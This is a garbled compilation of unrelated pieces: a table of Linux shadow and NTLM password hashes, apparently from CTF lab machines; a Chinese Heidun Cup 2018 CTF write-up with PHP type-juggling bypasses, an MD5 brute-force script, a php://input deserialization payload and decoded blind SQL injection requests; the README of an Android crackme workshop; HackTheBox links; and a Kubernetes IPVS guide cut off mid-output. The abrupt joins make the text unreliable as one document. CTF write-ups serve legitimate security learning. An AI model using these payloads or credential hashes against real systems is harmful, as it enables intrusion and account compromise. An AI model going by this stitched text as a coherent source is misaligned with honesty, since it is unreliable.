`john:$6$aoN7zaDl$e6RsRZndFekSS4bgqz0y5dgzO1dTQsMAWck6dFGogkxrrZf1ZyGbjy/oCpqJniIkasXP05iFZHs.XZVIQqZ2w1:17594:0:99999:7:::` | | 33. | `klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::` | | 34. | `Lakis:1009:f927b0679b3cc0e192410d9b0b40873c:3064b6fc432033870c6730228af7867c:::` | | 35. | `loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::` | | 36. | `loneferret:$1$qbkHf53U$r.kK/JgDLDcXGRC6xUfB11:15079:0:99999:7:::` | | 37. | `mai:$6$Mp.mBBi7$BCAKb75xSAy8PM6IhjdSOIlcmHvA9V4KnEDSTZAN2QdMUwCwGiwZtwGPXalF15xT097Q6zaXrY6nD/7RsdSiE0:17594:0:99999:7:::` | | 38. | `makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::` | | 39. | `mark:$6$//1vISW6$9pl2v8Jg0mNE7E2mgTQlTwZ1zcaepnDyYE4lIPJDdX7ipnxm/muPD7DraEm3z0jqDe5iH/Em2i6YXJpQD.5pl0:18010:0:99999:7:::` | | 40. | `mark:$6$J3gYK/cQ$au1WmOCtq.X1DTKt1CEmKA9qr4PfwZuAGUdCfAV.SSU5VxAtjW/Xk1/oWJtQVaoXMEVXmeBIB6bq24JpcSRjF0:17408:0:99999:7:::` | | 41. | `mysql:$6$O2ymBAYF$NZDtY392guzYrveKnoISea6oQpv87OpEjEef5KkEUqvtOAjZ2i1UPbkrfmrHG/IonKdnYEec0S0ZBcQFZ.sno/:18053:0:99999:7:::` | | 42. | `notch:$6$RdxVAN/.$DFugS5p/G9hTNY9htDWVGKte9n9r/nYYL.wVdAHfiHpnyN9dNftf5Nt.DkjrUs0PlYNcYZWhh0Vhl/5tl8WBG1:17349:0:99999:7:::` | | 43. | `noulis:$6$ApsLg5.I$Zd9blHPGRHAQOab94HKuQFtJ8m7ob8MFnX6WIIr0Aah6pW/aZ.yA3T1iU13lCSixrh6NG1.GHPl.QbjHSZmg7/:17247:0:99999:7:::` | | 44. | `Ori:$6$1zYgjEIM$VQ0gvU7JjenS9WuiVjSeva8pbWnEXjqTmEdFnQRXKmTmXPXmt55/oyup40NiXD8J9GxmXF7DYiaHZDRshrs3f1:17237:0:99999:7:::` | | 45. | `oscp:$6$k8OEgwaFdUqpVETQ$sKlBojI3IYunw8wEDAyoFdHgVtOPzkDPqksql7IWzpfZXpd3UqP569BokTZ52mDroq/rmJY9zgfeQVmBFu/Sf.:18452:0:99999:7:::` | | 46. | `peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::` | | 47. | `pi:$6$SQPHFoql$gSE5qWbZRGHDin4LnFY56sMnQsmvH/o2oIlXv.3KcqVsJCYgJ09R9/Pws88e8yjKgJnaxN3zdq8f5ots1bJcY/:17148:0:99999:7:::` | | 48. | `postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::` | | 49. | `puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::` | | 50. | `reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::` | | 51. | `robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::` | | 52. | `robot:$6$HmQCDKcM$mcINMrQFa0Qm7XaUaS5xLEBSeP3bUkr18iwgwTAL8AIfUDYBWG5L8J9.Ukb3gVWUQoYam4G0m.I5qaHBnTddK/:16752:0:99999:7:::` | | 53. | `root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::` | | 54. | `root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh` | | 55. | `root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::` | | 56. | `root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::` | | 57. | `root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7:::` | | 58. | `root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::` | | 59. | `root:$6$.wvqHr9ixq/hDW8t$a/dHKimULfr5rJTDlS7uoUanuJB2YUUkh.LWSKF7kTNp4aL8UTlOk2wT8IkAgJ.vDF/ThSIOegsuclEgm9QfT1:18452:0:99999:7:::` | | 60. | `root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7:::` | | 61. | `root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::` | | 62. | `root:$6$BVgS5ne0$Q6rV3guK7QQUy7uRMwbQ3vv2Y5I9yQUhIzvrIhuiDso/o5UfDxZw7MMq8atR3UdJjhpkFVxVD0cVtjXQdPUAH.:17431:0:99999:7:::` | | 63. | `root:$6$CM3c1cdI$HbQWZlQdGEWV8yo3j7M84i1/RFK4G7fafTUIUYLWk52zm9O8KRLhqZenF8KbqsUjHlZQk4VmNEeEbBCRjOWbH0:17111:0:99999:7:::` | | 64. | `root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::` | | 65. | `root:$6$GpmQGQUN$8kLewzMF4ItmxezcryWqSPrXNRTH5TOQFKKkHjK2NSmrTg95xiYi.l8L.RYUL.8pAsj8s4EGvDy4dvENQIqNf.:15585:0:99999:7:::` | | 66. | `root:$6$kdMFceEg$pk9h93tdD7IomhE7L0Y396HO6fxSM.XDh9dgeBhKpdZlM/WYxCZe7yPRNHfZ5FvNRuILVp2NOsqNmgjoSx/IN0:18012:0:99999:7:::` | | 67. | `root:$6$L2m6DJwN$p/xas4tCNp19sda4q2ZzGC82Ix7GiEb7xvCbzWCsFHs/eR82G4/YOnni/.L69tpCkOGo5lm0AU7zh9lP5fL6A0:17247:0:99999:7:::` | | 68. | `root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::` | | 69. | `root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1:18050:0:99999:7:::` | | 70. | `root:$6$n.BA4A59$WeIF0ZbaB3VGgAxUZqGHnw01.GhL9oVYYFioh07RpPtBl49YdMahhtbYhxUjanXf/NJXiCHBvrNhdC53P1UX2.:17412:0:99999:7:::` | | 71. | `root:$6$O4bZf1Ju$0xcLPNyQkVcKT0CajZYBOTz4thlujMRjQ7XuFstUDWwYHKmVmJsDmzGXUwYbU1uqr6jxEvX4XJjSUgiwjPmEp0:17399:0:99999:7:::` | | 72. | `root:$6$P7ElNgGp$fNzyy4OgqSR1ANJXTgbpzp4U42JXG1qJ55iNV10NVJoX5UWjtckWD0oHmcTOj0lqObyWhFu2y3udHVpHaqYxf.:17238:0:99999:7:::` | | 73. | `root:$6$PnbVvEMS$OcseJT8lZRrgrW1JBpHJ252SPRxS6Rkh3oVBkrbRBZgHBD1wArL6FcyO5daqaon7waFKwSqbg5fIjFgzUVFMS1:18048:0:99999:7:::` | | 74. | `root:$6$qAoeosiW$fsOy8H/VKux.9K0T3Ww2D3FPNlO5LAaFytx/6t69Q7LPDSS/nNiP4xzq0Qab.Iz3uy5fYdH3Aw/K5v3ZMhRRH0:16756:0:99999:7:::` | | 75. | `root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::` | | 76. | `sarah:$6$DoSO7Ycr$2GtM5.8Lfx9Sw8X1fDMF.7zWDoVoy1892nyp0iFsqh5CfmtEROtxmejvQxu0N/8D7X8PQAGKYGl.gUb6/cG210:18010:0:99999:7:::` | | 77. | `scriptmanager:$6$WahhM57B$rOHkWDRQpds96uWXkRCzA6b5L3wOorpe4uwn5U32yKRsMWDwKAm.RF6T81Ki/MOyo.dJ0B8Xm5/wOrLk35Nqd0:17504:0:99999:7:::` | | 78. | `service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::` | | 79. | `setup:$6$PR5zOqWk$3MKXMgf6.4bLlznh0R87RB4qaOAcGhbE0Cs8xtUqVPHP8x0553/6aMZnfsZOWKXL0DOqUcVRkfCQN8DvjdZNc1:17086:0:99999:7:::` | | 80. | `shelly:$6$aYLAoDIC$CJ8f8WSCT6GYmbx7x8z5RfrbTG5mpDkkJkLW097hoiEw3tqei2cE7EcUTYdJTVMSa3PALZeBHjhiFR8Ba5jzf0:17431:0:99999:7:::` | | 81. | `smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::` | | 82. | `SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:8ed3993efb4e6476e4f75caebeca93e6:::` | | 83. | `susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::` | | 84. | `sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::` | | 85. | `togie:$6$dvOTOc6x$jpt1MVPeBsVlfkhVXl3sv21x2Ls2qle8ouv/JMdR6yNpt2nHHahrh0cyT.8PfVcNqlrAHYFkK2WYdSbxQ4Ivu1:17392:0:99999:7:::` | | 86. | `tom:$6$ptD/.gN.$n.B/5dODEQFteBwg75Ip9leeaaXSMesGbfZzoVHpZihMHfbWu45UpVZTc6razK1JLZ6817ckZhAJF776Dg/ZJ0:17407:0:99999:7:::` | | 87. | `user1:$6$9iyn/lCu$UxlOZYhhFSAwJ8DPjlrjrl2Wv.Pz9DahMTfwpwlUC5ybyBGpuHToNIIjTqMLGSh0R2Ch4Ij5gkmP0eEH2RJhZ0:18050:0:99999:7:::` | | 88. | `user2:$6$7gVE7KgT$ud1VN8OwYCbFveieo4CJQIoMcEgcfKqa24ivRs/MNAmmPeudsz/p3QeCMHj8ULlvSufZmp3TodaWlIFSZCKG5.:18050:0:99999:7:::` | | 89. | `user3:$6$PaKeECW4$5yMn9UU4YByCj0LP4QWaGt/S1aG0Zs73EOJXh.Rl0ebjpmsBmuGUwTgBamqCCx7qZ0sWJOuzIqn.GM69aaWJO0:18051:0:99999:7:::` | | 90. | `user4:$6$0pxj6KPl$NA5S/2yN3TTJbPypEnsqYe1PrgbfccHntMggLdU2eM5/23dnosIpmD8sRJwI1PyDFgQXH52kYk.bzc6sAVSWm.:18051:0:99999:7:::` | | 91. | `user5:$6$wndyaxl9$cOEaymjMiRiljzzaSaFVXD7LFx2OwOxeonEdCW.GszLm77k0d5GpQZzJpcwvufmRndcYatr5ZQESdqbIsOb9n/:18051:0:99999:7:::` | | 92. | `user6:$6$Y9wYnrUW$ihpBL4g3GswEay/AqgrKzv1n8uKhWiBNlhdKm6DdX7WtDZcUbh/5w/tQELa3LtiyTFwsLsWXubsSCfzRcao1u/:18051:0:99999:7:::` | | 93. | `user7:$6$5RBuOGFi$eJrQ4/xf2z/3pG43UkkoE35Jb0BIl7AW/umj1Xa7eykmalVKiRKJ4w3vFEOEOtYinnkIRa.89dXtGQXdH.Rdy0:18052:0:99999:7:::` | | 94. | `user8:$6$fdtulQ7i$G9THW4j6kUy4bXlf7C/0XQtntw123LRVRfIkJ6akDLPHIqB5PJLD4AEyz7wXsEhMc2XC4CqiTxATfb20xWaXP.:18052:0:99999:7:::` | | 95. | `user:$6$gLVDPSY5$CGHDuEBpkC90vX2xFD9NeJC0O9XfhVj9oFVvL8XbTRpBnt/7WJFpADj0zboPTKTqPbOHafZGUd/exj4OZ1Frc/:15585:0:99999:7:::` | | 96. | `veronica:$6$ud4650Og$j9dN4Xh6nHTDUQ5LpnrUzl6FdRiapcGvjg0JU2/Wx.G5Q.PFtbv.sa4OJyNnzTVsFEMmgnEZQV1nxGFiy56zS/:17033:0:99999:7:::` | | 97. | `vulnix:$6$tMOyhDF2$gExhASDVWJqHYn00.A8XLJb.DvE7bdD6NffAno3iY5zEkJwZ4yDTGMrhdVbkMXV1dlBT00DoGFR7oXbtDi3lQ0:15585:0:99999:7:::` | | 98. | `wpadmin:$6$FtTN/YPC$iidNFmRVpQ1p2kkfoOZ6OzNPqR95DQ/7G10aze2CA2W3ik/sHHyEPaNNY57tMvRDU0/Rs62FEimiKXD2VgEYC1:17096:0:99999:7:::` | | 99. | `www-data:$6$SYixzIan$P3cvyztSwA1lmILF3kpKcqZpYSDONYwMwplB62RWu1RklKqIGCX1zleXuVwzxjLcpU6bhiW9N03AWkzVUZhms.:17264:0:99999:7:::` |
2018/9/16 福师大黑盾杯 ![1537107338208](images/1537107338208.png) # 信息泄露+代码审计 svn泄露源码:http://192.168.200.200/web/codeaudit/.svn/text-base/index.php.svn-base.txt ```php <?php error_reporting(0); $user = $_COOKIE['user']; $code = $_GET['code']?(int)$_GET['code']:''; if($user == 'admin' && !empty($code)) { $hex = (int)$code; if(($hex ^ 6789) === 0xCDEF) { require("flag.php"); echo $flag; exit(); } echo "ȱ��Ӧ�еIJ���,��û��Ȩ�޲鿴������"; ?> ``` `GET` 请求`code=55146` , 请求头添加`Cookie: user=admin;` 。 `flag{a737c5c5b759c3705c8100accf65b5e4}` # 最好的语言 ```php <?php show_source(__FILE__); $a=0; $b=0; $c=0; $d=0; if (isset($_GET['x1'])) //$x1=0;=>$a=1; { $x1 = $_GET['x1']; $x1=="1"?die("ha?"):NULL; switch ($x1) { case 0: case 1: $a=1; break; } } $x2=(array)json_decode(@$_GET['x2']); //$x2=json_encode(['x21'=>'2018hello','x22'=>[[],0]]) ; //string(32) "{"x21":"2018hello","x22":[[],0]}" if(is_array($x2)){ is_numeric(@$x2["x21"])?die("ha?"):NULL; if(@$x2["x21"]){ ($x2["x21"]>2017)?$b=1:NULL; } if(is_array(@$x2["x22"])){ if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?"); $p = array_search("XIPU", $x2["x22"]); //array_search — 在数组中搜索给定的值,如果成功则返回相应的键名 //mixed array_search( mixed $needle, array $haystack[, bool $strict = false] ) //第三个参数决定在搜索时是否比较类型,默认不比较,也是这里能够绕过的原因。 //var_dump(array_search('XIPU', array("0","1",0)));//int(2) //0==‘XIPU’为真,搜索到0值的下标为2 $p===false?die("ha?"):NULL; foreach($x2["x22"] as $key=>$val){ $val==="XIPU"?die("ha?"):NULL; } $c=1; } } $x3 = $_GET['x3']; if ($x3 != '15562') { if (strstr($x3, 'XIPU')) { if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) { //两个符合正则 /0e\d+/ 的字符串弱相等。 // 爆破见下方python代码 $d=1; } } } if($a && $b && $c && $d){ include "flag.php"; echo $flag; } ?> ``` ```python def brute(): for a in range(0x20, 0x7f): for b in range(0x20, 0x7f): for c in range(0x20, 0x7f): x = chr(a) + chr(b) + chr(c)+s mm=md5(x.encode('UTF-8')).hexdigest() flag=1 for i in mm[10:24]: if i not in '0123456789': flag=0 break if flag and mm[8:10]=='0e': print(x) brute() # kN[XIPU # v=|XIPU # y'wXIPU # }MOXIPU # ~VhXIPU ## http://192.168.200.200/web/bestlanguage/?x1=0&x2={%22x21%22:%222018hello%22,%22x22%22:[[],0]}&x3=~VhXIPU ## flag{510ea2879fa29d0d618b1f55350965c3} ``` # the user is admin 和 bugku 平台某个题目原理相似,因此没有保留源码。可以参考 [该题](https://findneo.github.io/180406BugkuWriteup/#welcome-to-bugkuctf) ,不赘述。 ```php /web/theuserisadmin/?file=class.php&user=php://input&pass=O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";} post:the user is admin //flag{078d8dd8023d5716a11780adf344dfd2} ``` # ccgs ![1537109403700](images/1537109403700.png) ```python binwalk -e sgcc.png cat secret.txt | base64 -d | base64 -d > final.png ``` ![1537070199581](images/1537070199581.png) # 注入日志分析 给了一个日志文件,`file data.log`得到是一个文本文件,直接打开,前几行是 ``` #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2015-10-21 09:16:34 ``` 猜测是IIS服务器记录的流量日志, 分析前几行 ``` 2015-10-21 09:16:34 W3SVC1 192.168.1.135 GET /index.htm - 80 - 192.168.1.101 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.10;+rv:41.0)+Gecko/20100101+Firefox/41.0 200 0 0 2015-10-21 09:16:34 W3SVC1 192.168.1.135 GET /favicon.ico - 80 - 192.168.1.101 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.10;+rv:41.0)+Gecko/20100101+Firefox/41.0 404 0 2 2015-10-21 09:16:36 W3SVC1 192.168.1.135 GET /show.asp id=2 80 - 192.168.1.101 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.10;+rv:41.0)+Gecko/20100101+Firefox/41.0 200 0 0 2015-10-21 09:25:01 W3SVC1 192.168.1.135 GET /show.asp id=2%27|17|80040e14|字符串_''_之前有未闭合的引号。 80 - 192.168.1.101 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.10;+rv:41.0)+Gecko/20100101+Firefox/41.0 500 0 0 ``` 可以看到就是一条条的HTTP请求,并且后面跟着状态码。继续浏览,看到`id`字段出现一些`SQL`的关键字,那么可以想到这记录的就是`sqlmap`(或许)的注入流量分析。思路就是找到关键的注入请求,文件很大,我们可以搜索`flag`试试,找到关键的请求如下 ``` ... 2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2%20AND%20UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28LTRIM%28STR%28COUNT%28DISTINCT%28theflag%29%29%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20tourdata.dbo.news%29%2C1%2C1%29%29%3E51|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0 2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2%20AND%20UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28LTRIM%28STR%28COUNT%28DISTINCT%28theflag%29%29%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20tourdata.dbo.news%29%2C1%2C1%29%29%3E48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0 ... ``` 可以利用文本编辑器如`sublime text 3`的`ctrl+H`的替换功能, 将关键流量进行精简并`urldecode`利于分析(截取两个代表性请求) ``` id=2 AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(DISTINCT(theflag)))) AS NVARCHAR(4000)),CHAR(32)) FROM tourdata.dbo.news),1,1))>51|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 500 0 0 id=2 AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(DISTINCT(theflag)))) AS NVARCHAR(4000)),CHAR(32)) FROM tourdata.dbo.news),1,1))>48 80 200 0 0 ``` 可以看到这里是二分法盲注的HTTP请求,现在思路很明确了, 从`SUBSTRING(.*, 1, 1)`开始找,并且只要看最后几条的注入请求就可以判断出字符是多少。 比如`SUBSTRING(.*, 1, 1) > 48`的状态码是`200`,`SUBSTRING(.*, 1, 1) > 49`的状态码是`500`,那其实就可以确定字符的ascii码是49。就这样就能得到`theflag`的值。 # brightstar [列移位密码](https://ctf-wiki.github.io/ctf-wiki/crypto/classical/others/#_9) ```python snkeegt fhstetr Iedsabs tnaktrt otessha iiriwis tethees key: howarey Columnar Transposition Cipher ``` | h | o | w | a | r | e | y | | ---- | ---- | ---- | ---- | ---- | ---- | ---- | | 3 | 4 | 6 | 1 | 5 | 2 | 7 | | I | t | i | s | o | f | t | | e | n | i | n | t | h | e | | d | a | r | k | e | s | t | | s | k | i | e | s | t | h | | a | t | w | e | s | e | e | | b | r | i | g | h | t | e | | s | t | s | t | a | r | s | 或者 ```python c='snkeegt fhstetr Iedsabs tnaktrt otessha iiriwis tethees'.split(' ') k='howarey' kk=sorted(k) print(''.join(c[kk.index(j)][i] for i in range(len(k)) for j in k)) # Itisofteninthedarkestskiesthatweseebrighteststars ``` # 这是啥呀 base32编码 ```shell echo MZWGCZ33MM4GENJVHBRDSNJUGAYTSOBVGZTDAYRQGIZTINLEMMZTSNJVHBRX2=== | base32 -d #flag{c8b558b954019856f0b02345dc39558c} ``` # Windows逆向 ``` s='sKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138' flag='' idx=[1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42] for i in idx: flag+=s[i] print(flag) # KEY{e2s6ry3r5s8f6 ``` 得到部分flag,加上1024}得到完整flag:KEY{e2s6ry3r5s8f61024} # reverseme ```python python -c "open('file.png','wb').write(open('reverseme','rb').read()[::-1])" 或 <reverseme xxd -p -c1 | tac | xxd -p -r >file.png ``` ![1537420090085](images/1537420090085.png) ```shell convert -flop file.png mirror_file.png ``` ![1537420103233](images/1537420103233.png) # 下午 [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) 扫出配置文件 http://192.168.200.202//configuration.php.txt 底部有flag: `flag{0b58f603ff55c0c190502b44b4ffbf2c}` 此外一些没进一步利用上的信息和部分题目的附件放在[GiIthub](https://github.com/findneo/ctfgodown/blob/master/20180916heidun/) ,有兴趣可移步查看。
# CyberTruckChallenge19 Android security workshop taught at the CyberTruck Challenge 2019 (Detroit USA). Further info at https://www.cybertruckchallenge.org ## Description A new mobile remote keyless system "CyberTruck" has been implemented by one of the most well-known car security companies "NowSecure Mobile Vehicles". The car security company has ensured that the system is entirely uncrackable and therefore attackers will not be able to recover secrets within the mobile application. If you are an experienced Android reverser, then enable the `tamperproof` button to harden the application before unlocking your cars. Your goal will consist on recovering up to 6 secrets in the application. ## Material The content is provided in folders such as: - `slides`: Presentation during the Android workshop (1h) - `apk`: Final Android crackme APK which can unlock up to 3 vehicles. - `src`: Source code of the crackme - `notes`: Additional notes, troubleshooting, and so on - `solutions`: Possible solutions to the crackme (x86 and Aarch64) - `student`: JS code provided as template to write your Frida hooks - `img:`: Screenshots of the crackme running on the Android emulator ## Mobile CTF: Android Crackme It is required to have an Android device either emulated or physical. During the workshop we employed an AVD Google Pixel 2XL running Android 9.0 that it can be obtained for free with Android Studio. Additionally, the tamperproof check needs to have the Frida server binary placed in `/data/local/tmp/frida-server`. ![logo](img/cybertruckMobileKeyless2.png) ### Challenge1 to unlock car1. "DES key: Completely Keyless. Completely safe" - `50pts`: There is a secret used to create a DES key. Can you tell me which one? - `100pts`: There is a token generated at runtime to unlock the carid=1. Can you get it? (flag must be submitted in hexa all lowercase) ### Challenge2 to unlock car2: "AES key: Your Cell Mobile Is Your Key" - `50pts`: This challenge has been obfuscated with ProGuard, therefore you will not recover the AES key. - `100pts`: There is a token generated at runtime to unlock the carid=2. Can you get it? (flag must be submitted in hexa all lowercase) ### Challenge3 to unlock car3. "Mr Truck: Unlock me Baby!" - `50pts`: There is an interesting string in the native code. Can you catch it? - `100pts`: Get the secret generated at runtime to unlock the carid=3. Security by obscurity is not a great design. Use real crypto! (hint: check the length when submitting the secret!) ### Contact Eduardo Novella <[email protected]> ### Public Write-ups - [verso.se](https://www.verso.re/posts/cybertruck/) (by [Joan Calabrés](https://twitter.com/jcalabres22)) - [bugbountywriteup](https://medium.com/bugbountywriteup/cybertruck-challenge-2019-android-ctf-e39c7f796530) (by [Harshit Maheshwari](https://twitter.com/fake_batman_)) - [GitHub](https://github.com/user1342/CyberTruck-2019-Android-CTF-Writeup) (By [James Stevenson](https://twitter.com/_JamesStevenson)) - [GitHub.io](https://nibarius.github.io/learning-frida/2020/08/17/cybertruckchallange19) (by [Nibarius](https://github.com/nibarius)) - [GitHub.io (native layer)](https://nibarius.github.io/learning-frida/2020/08/22/cybertruckchallange19-revisited) (by [Nibarius](https://github.com/nibarius))
### Read from top to bottom * https://github.com/austin-lai/HackTheBox-WriteUp/tree/main/HackTheBox(HTB)-Devzat * https://book.hacktricks.xyz/pentesting/8086-pentesting-influxdb#dump-table * https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 * https://stackoverflow.com/questions/33198428/jwt-module-object-has-no-attribute-encode * https://github.com/A1vinSmith/OSCP-PWK/wiki/SSH-&-Chisel
- [IPVS](#ipvs) - [What is IPVS](#what-is-ipvs) - [IPVS vs. IPTABLES](#ipvs-vs-iptables) - [When ipvs falls back to iptables](#when-ipvs-falls-back-to-iptables) - [Run kube-proxy in ipvs mode](#run-kube-proxy-in-ipvs-mode) - [Prerequisite](#prerequisite) - [Local UP Cluster](#local-up-cluster) - [GCE Cluster](#gce-cluster) - [Cluster Created by Kubeadm](#cluster-created-by-kubeadm) - [Debug](#debug) - [Check IPVS proxy rules](#check-ipvs-proxy-rules) - [Why kube-proxy can't start IPVS mode](#why-kube-proxy-cant-start-ipvs-mode) # IPVS This document intends to show users - what is IPVS - difference between IPVS and IPTABLES - how to run kube-proxy in ipvs mode and info on debugging ## What is IPVS **IPVS (IP Virtual Server)** implements transport-layer load balancing, usually called Layer 4 LAN switching, as part of Linux kernel. IPVS runs on a host and acts as a load balancer in front of a cluster of real servers. IPVS can direct requests for TCP and UDP-based services to the real servers, and make services of real servers appear as virtual services on a single IP address. ## IPVS vs. IPTABLES IPVS mode was introduced in Kubernetes v1.8 and goes beta in v1.9. IPTABLES mode was added in v1.1 and become the default operating mode since v1.2. Both IPVS and IPTABLES are based on `netfilter`. Differences between IPVS mode and IPTABLES mode are as follows: 1. IPVS provides better scalability and performance for large clusters. 2. IPVS supports more sophisticated load balancing algorithms than iptables (least load, least connections, locality, weighted, etc.). 3. IPVS supports server health checking and connection retries, etc. ### When ipvs falls back to iptables IPVS proxier will employ iptables in doing packet filtering, SNAT and supporting NodePort type service. Specifically, ipvs proxier will fall back on iptables in the following 4 scenarios. **1. kube-proxy starts with --masquerade-all=true** If kube-proxy starts with `--masquerade-all=true`, ipvs proxier will masquerade all traffic accessing service Cluster IP, which behaves the same as what iptables proxier. Suppose there is a service with Cluster IP `10.244.5.1` and port `8080`, then the iptables installed by ipvs proxier should be like what is shown below. ```shell # iptables -t nat -nL Chain PREROUTING (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain OUTPUT (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain POSTROUTING (policy ACCEPT) target prot opt source destination KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */ Chain KUBE-POSTROUTING (1 references) target prot opt source destination MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000 Chain KUBE-MARK-DROP (0 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x8000 Chain KUBE-MARK-MASQ (6 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000 Chain KUBE-SERVICES (2 references) target prot opt source destination KUBE-MARK-MASQ tcp -- 0.0.0.0/0 10.244.5.1 /* default/foo:http cluster IP */ tcp dpt:8080 ``` **2. Specify cluster CIDR in kube-proxy startup** If kube-proxy starts with `--cluster-cidr=<cidr>`, ipvs proxier will masquerade off-cluster traffic accessing service Cluster IP, which behaves the same as what iptables proxier. Suppose kube-proxy is provided with the cluster cidr `10.244.16.0/24`, and service Cluster IP is `10.244.5.1` and port is `8080`, then the iptables installed by ipvs proxier should be like what is shown below. ```shell # iptables -t nat -nL Chain PREROUTING (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain OUTPUT (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain POSTROUTING (policy ACCEPT) target prot opt source destination KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */ Chain 